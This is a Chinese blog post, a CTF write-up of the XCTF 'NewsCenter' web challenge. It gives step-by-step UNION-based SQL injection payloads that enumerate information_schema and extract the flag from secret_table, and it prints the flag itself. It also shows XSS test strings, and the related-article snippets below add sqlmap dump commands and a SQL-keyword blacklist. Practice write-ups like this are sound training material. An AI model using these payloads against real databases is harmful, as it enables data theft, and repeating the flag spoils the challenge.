攻防世界:Web:NewsCenter靶场复盘

最新推荐文章于 2024-09-03 19:23:32 发布
最新推荐文章于 2024-09-03 19:23:32 发布
阅读量115 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/120793777
版权

安全 sql 信息安全 xss database
目录

靶场内容:

imageimage

需要吐槽一下,这个靶场我起码进了五次,环境才没有错

漏洞分析

  • 拿到题目,是一个新闻搜索框
  • 猜想可能有两种漏洞:XSS漏洞和SQL漏洞
  • 尝试XSS漏洞:<script>alert(1)</script>'"/><script>alert(1)</script>
  • 然后就报错了呃
  • 尝试SQL注入:(这里注释使用#,猜想--+可能被过滤)
    • 输入 1 不报错(废话)
    • 输入 1' 报错,猜想可能是变量用单引号包裹的
    • 输入 1" 不报错,说明极有可能是单引号包裹
    • 输入 1'# 不报错,说明就是单引号包裹的
  • 使用语句:1' and 1=2 union select 1,2,3 #(试过好多遍了才知道是三位)判断2,3被回显出来了
  • 爆数据库:1' and 1=2 union select 1,2,database() #
  • 爆表名:1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #
  • 猜想我们的数据表应该是secret_table
  • 爆列名:1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() #
  • 此时看见了fl4g列,猜想这个是flag
  • 输入1' and 1=2 union select 1,2,fl4g from secret_table#
  • 就可得到flag:QCTF{sq1_inJec7ion_ezzz}
Zeker62
关注
攻防世界靶场web-supersqli)--堆叠注入、二次注入
DMXA的博客
09-21 478
这段代码是使用 PHP 语言编写的一个正则表达式,用于检测变量 $inject 中是否包含一些常见的 SQL 注入攻击关键字。具体来说,它通过 preg_match() 函数匹配字符串 $inject 中是否存在以下关键字(不区分大小写):select: 查询关键字。update: 更新关键字。delete: 删除关键字。drop: 删除表关键字。insert: 插入关键字。where: 查询条件关键字。.: 正则表达式中的特殊字符,可能被用于注入攻击。
攻防世界Web new hand题目靶场解题
m0_59343440的博客
01-13 545
第一个靶场view source 打开题目在线场景,让我们找到源代码,但是不能用鼠标右键 我的第一反应是快捷键Ctrl+u或Ctrl+Shift+I,一秒得到该网页源代码,就可以得知flag的值 另一种方法是在在网址前加上view-source:来查看网页的源代码,不过并非所有网站都支持view-source这种查看代码源的协议 得到flag并提交 第二个靶场robots 点开题目的在线场景是一个空白页面 而Robots协议是指在网站的根目录下有robots.txt来...
[待完成] 攻防世界 —— 靶场笔记合集
最新发布
Blue17 の 小窝
09-03 298
攻防世界靶场各等级过关笔记 + 配套资源
攻防世界web fakebook(高质量靶场
Zeker62的博客
09-05 226
目录先进行目录扫描打开现有扫描文件按照网页规则进行尝试检查页面源代码总结 自己做已经找到了SQL注入漏洞了,但是后面盲注太慢了而且发现并没有什么有用的信息 找到了一个博客,写得很好,我梳理一下成为自己的东西https://blog.csdn.net/qq_41500251/article/details/105383065下面是它做题的思路: 先进行目录扫描 这个博主用的是webscan,我用御...
【网络安全攻防世界web new bird区前十个靶场
ZYP_997_的博客
01-17 4776
攻防世界第一天 攻防世界web new bird区前十个靶场 攻防世界web new bird区的前十个靶场 1、第一题:view_source 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 题目解析:题目要求我们查看一个网页的源代码,并且已知鼠标右键不能使用,即需要我们使用其他方法来查看网页源代码。 题目解答: 1、方法一 首先我们点击”点击获取在线场景“,然后加载结束后点击网址进行跳转,会显示如下图,接下来按F12,查看网页源代码,然后找到FLAG,即可通关。
攻防世界-NewsCenter
weixin_46784800的博客
11-12 1550
攻防世界-NewsCenter题 首先,进入靶场网站,发现是一个News界面,并且界面存在一个搜索入口,此时的第一感觉就是,这道题应该是一道sql注入的题目(后来发现确实是这样) 在搜索框输入一系列数字或字母进行搜索,可搜索出来一些News: 打开HackBar,在POST请求值处的字符串末尾输入单引号,尝试是否能发生单引号闭合: 发现请求的返回值为500,则说明该请求在服务器的数据库中发生了单引号闭合,导致数据库查询失败,这时已经可以实锤本题为数据库注入的题目了。 首先,通过order语句,判断查询
攻防世界 WEB NewsCenter
ChaoYue_miku的博客
01-08 273
攻防世界 WEB NewsCenter NewsCenter:   题目只有一个搜索框,下面显示搜索结果,最先考虑的就是sql注入,先简单构造' or '1=1,果然返回了所有新闻(7条)查看网页源码,发现这里是post方式,可以考虑使用sqlmap。   但是如此形式的sql漏洞应该还有别的方法,毕竟这一看就没有任何过滤验证,也没有提前预编译,是最基础的sql漏洞了,在这里尝试手工构造语句,看看能不能获得什么信息。   通常的方法就是单引号、1、2等尝试,然...
攻防世界 WEB newscenter
qq_41696858的博客
08-03 314
看到提交框就条件反射sql注入 先sqlmap跑,能跑的情况下优先 把burpsuite抓到的包保存为1.txt sqlmap -l 1.txt sqlmap -l 1.txt --dbs sqlmap -l 1.txt -D news --tables sqlmap -l 1.txt -D news -T secret_tables --columns --dump 一套组合拳打完,成功拿到flag 当然可以自己手工注入 ' and 0 union select 1,table_schema,tabl
攻防世界webNewsCenter
HHH's Blogs
12-01 2719
可以先看SQL注入 SQL注入参考: 1' or '1=1//构造报错 1' union select 1,2,3#//查列名 1' union select 1,2,table_name from information_schema.tables #查库名 1' union select 1,column_type,column_name from information_schema.columns where table_name='secret_table' #//查表名 1' union sel
去除cnewscenter弹窗_攻防世界 web进阶区 NewsCenter
weixin_39874379的博客
12-22 9280
攻防世界 web进阶区 NewsCenter解题首先我们打开网页,发现题目中只有一个搜索框,然后通过查看源代码等方式都无法获得任何有用的信息。所以题目肯定是从这个搜索框入手的,那么就首先抓包试试。抓到这样一些数据,但是经过尝试也没有什么办法获取信息,只发现了搜索使用的是post请求。最后想到了一般这样的搜索框可能会存在sql注入,所以及逆行尝试。但是由于手注的技术实在是太差了,就先用sqlmap来...
功防世界web靶场详解
weixin_48421613的博客
10-24 1191
最近看到了一个十分牛掰的靶场,里面有各种各样的好东西,链接在此https://adworld.xctf.org.cn web入门题,第一题 很显然,这道题只要能找到源代码就可以了,像火狐浏览器都有f12功能就可以查看网站源码,但是不知道为啥我的就不行,不过不要紧,在浏览器设置选项也是可以查看源代码的,大家别忘了点击题目场景里面的ip地址哦 成功获得源码 2. 第二题,robots.txt文件是一种类似于君子协议的东西,里面会存放一些默认的敏感文件,如果网站建站不删除此文件则会泄露一些敏感信息 如上
【网络安全】适合新手的CTF靶场合集(非常详细)零基础入门到精通,收藏这一篇就够了
Python_paipai的博客
05-13 1064
经常会有粉丝朋友询问大白,如何打CTF比赛,有没有适合新手的CTF靶场?今天呢大白就给粉丝朋友分享一下,我整理得可能没有那么全,这里的合集主要还是面对新手。做题贵精不在多,好好练习每一题,学习每个知识点,不懂的百度或者 Google 即可。记住,你是为了提高自己而去打 CTF。
【网络安全】适合新手的CTF靶场合集(必看)
wuli1024的博客
01-18 2136
我整理得没有那么全,这里的合集主要还是面对新手。做题贵精不在多,好好练习每一题,学习每个知识点,不懂的百度或者 Google 即可。记住,你是为了提高自己而去打 CTF。
攻防世界-bug题目详解
chinese_cabbage0的博客
05-22 615
php、文件上传、md5、sql、xff
渗透测试靶场环境搭建
ytdd66的博客
02-29 1558
CTF(Capture The Flag)竞赛是网络安全领域的一种竞技活动,旨在测试参与者的网络安全技能。解题模式(Jeopardy):这是最常见的CTF竞赛模式。参赛队伍需要在规定的时间内解决主办方提供的网络安全技术挑战题目。题目类型涵盖逆向工程、漏洞挖掘与利用、Web渗透、密码学、取证、隐写、安全编程等多个方面。解题的数量和正确性将决定参赛队伍的排名和得分。攻防模式(Attack-Defense):在这种模式下,参赛队伍在网络空间中相互攻击和防守。
CTF学习之路-攻防世界:MISC,入门篇
xuhc25的博客
11-26 3766
一、感谢和安利 我是从攻防世界入门的,感谢攻防世界的免费靶场 靶场地址:攻防世界 https://adworld.xctf.org.cn/ 二、MISC-新手练习篇Writeup 1、this_is_flag WP: 明显,入门用的,了解flag格式,直接提交题目例子的flag就可以了 flag{th1s_!s_a_d4m0_4la9} 2、pdf WP: 题目给的一个PDF文件,使用PDF编辑器打开(我用的是万兴PDF编辑器) 移出来看到就是flag了 3、give_you_flag WP:附件
jmeter 加密解密_攻防世界密码学解密
weixin_39944233的博客
10-22 251
攻防世界算是一个很不错的CTF练习靶场,各种方向都非常的全面,是一个非常适合新手的CTF靶场。在攻防世界中,存在 misc、pwn、web、reverse、crypto、mobile,共有六个项目,又分为新手练习跟高手进阶,以难易程度作为划分。本贴就以其中的crypto(密码学)项目为例,简单介绍一些密码学知识并且对新手练习区前几题进行解密。密码学是研究编制密码和破译密码的技术科学。研究...
DC靶场部署
xt_beginner的博客
01-10 569
DC靶场部署 官网下载连接:https://www.vulnhub.com 下载之后,使用VMware Workstation Pro导入靶场环境 一、解压 二、选择以VMware方式打开 三、存储路径选择解压路径 四、vof版本高于4.0,点击重试即可导入 Vof版本查看: 找到vmware安装目录,搜索OVFTool进入OVFTool目录,查看readme.txt,即可查看vof版本。 五、开始导入 打开虚拟机 ...
攻防世界 newscenter
09-08
攻防世界NewsCenter是一个基于React构建的前端应用程序,它提供了实时版本的背景和概述,展示了当前主流媒体如何报道当下的主题。你可以通过查看CNN、Fox News、NBC、NYTimes和Huffington Post主页上的精选文章来了解更多信息。此外,NewsCenter还涉及到CTF(Capture The Flag)比赛和SQL注入攻击的内容。在这个应用程序中,有两个表,分别是news和secret_table,我们需要从secret_table表中找到flag(标志)。通过构造SQL语句,并利用搜索(search)功能,我们可以使用union select和group_concat函数来获取所需的信息。最后,通过执行以下SQL语句search=-1' union select 1,version(),group_concat(fl4g) from secret_table --,我们可以得到flag的值为QCTF{sq1_inJec7ion_ezzz}。这是一个CTF比赛中的一个关卡,攻防世界NewsCenter也是为了帮助新手了解和学习Web安全而创建的。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值